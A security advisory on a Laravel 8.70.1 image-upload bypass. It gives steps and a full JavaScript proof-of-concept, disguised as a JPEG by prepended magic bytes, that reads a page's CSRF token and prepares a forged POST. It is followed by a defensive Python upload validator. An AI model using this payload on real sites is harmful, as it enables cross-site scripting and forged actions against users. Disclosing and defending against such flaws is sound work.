PHP Laravel 8.70.1 Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)

2021.11.15
Credit: Hosein Vita
Risk: Low
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)
# Date: 14/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://laravel.com/
# Software Link: https://laravel.com/docs/4.2
# Version: Laravel Framework 8.70.1
# Tested on: Windows/Linux
# Description: We can bypass the Laravel image file upload functionality to upload arbitrary files on the web server,
# which lets us run arbitrary JavaScript and bypass the CSRF token. For more information read
# https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b

# Steps to reproduce:

1- Use the HxD tool and add FF D8 FF E0 at the very beginning of your file

2- Use the code below to bypass the CSRF token

ÿØÿà<html>
<head>
<title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
// Target of the POST; edit the path as you want
var POST_URL = "/";

function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", POST_URL, true);
    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    // This is for debugging and can be removed
    xhr.onreadystatechange = function() {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            console.log(xhr.responseText);
        }
    };
    // xhr.send("_token=" + token + "&desiredParameter=desiredValue");
}

function getTokenJS() {
    var xhr = new XMLHttpRequest();
    // This tells it to return the response as an HTML document
    xhr.responseType = "document";
    // true on the end of here makes the call asynchronous
    // Edit the path as you want
    xhr.open("GET", "/image-upload", true);
    xhr.onload = function (e) {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            // Get the document from the response
            var page = xhr.response;
            // Get the input element
            var input = page.getElementsByTagName("input")[0];
            // Show the token
            alert("The token is: " + input.value);
            // Use the token to submit the form
            submitFormWithTokenJS(input.value);
        }
    };
    // Make the request
    xhr.send(null);
}

getTokenJS();
</script>
</body>
</html>

3- Save it as an HTML file and upload it.
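As an added defensive check (written for this page, not taken from the advisory or from Laravel's own validation rules), the Python below shows why a magic-byte prefix alone is a weak image test: it walks the JPEG marker segments after FF D8 and rejects a file whose bytes following FF D8 FF E0 do not form a segment with a plausible length, and it enforces an extension allow-list so an .html upload is never stored under a name the web server will serve as text/html. The sample inputs are constructed for the example.

```python
import os

# Markers that carry no length field: SOI, TEM and RST0-RST7.
_NO_LENGTH = {0xD8, 0x01, *range(0xD0, 0xD8)}
# Start-of-frame markers (SOF0..SOF15 minus DHT, JPG and DAC, which share the range).
_SOF = {0xC0, 0xC1, 0xC2, 0xC3, 0xC5, 0xC6, 0xC7, 0xC9, 0xCA, 0xCB, 0xCD, 0xCE, 0xCF}
ALLOWED_EXT = {".jpg", ".jpeg"}

# Constructed samples: a minimal JFIF header up to SOF0, and an advisory-style
# polyglot (JPEG magic bytes glued onto the start of an HTML document).
GOOD_JPEG_HEADER = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
                    b"\xff\xc0\x00\x11\x08\x00\x01\x00\x01\x03\x01\x11\x00\x02\x11\x01\x03\x11\x01")
POLYGLOT = b"\xff\xd8\xff\xe0<html><head><title>Laravel Csrf Bypass</title></head></html>"

def jpeg_structure_ok(data: bytes) -> tuple:
    """Walk marker segments from SOI until a frame header appears. Magic-byte
    sniffing stops at offset 4; this keeps parsing, so what follows must be JPEG."""
    if len(data) < 4 or data[:2] != b"\xff\xd8":
        return False, "missing SOI"
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return False, f"expected marker at offset {pos}"
        marker = data[pos + 1]
        if marker == 0xFF:  # padding byte before a marker
            pos += 1
            continue
        pos += 2
        if marker in _NO_LENGTH:
            continue
        if marker == 0xDA:  # scan data before any frame header
            return False, "SOS before SOF"
        if pos + 2 > len(data):
            return False, "truncated length field"
        seg_len = int.from_bytes(data[pos:pos + 2], "big")
        if seg_len < 2 or pos + seg_len > len(data):
            return False, f"bad segment length {seg_len} at offset {pos}"
        if marker in _SOF:
            return True, "frame header found"
        pos += seg_len
    return False, "no frame header before end of data"

def check_image_upload(filename: str, data: bytes) -> tuple:
    """Extension allow-list first (what keeps .html from being served as HTML), then structure."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext or '(none)'} not allowed"
    return jpeg_structure_ok(data)
```

A true polyglot can still carry HTML inside a correctly sized COM or APP segment, so the extension allow-list together with serving uploads under a fixed image Content-Type remains the primary control; the structural walk is defence in depth.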


Copyright 2021, cxsecurity.com
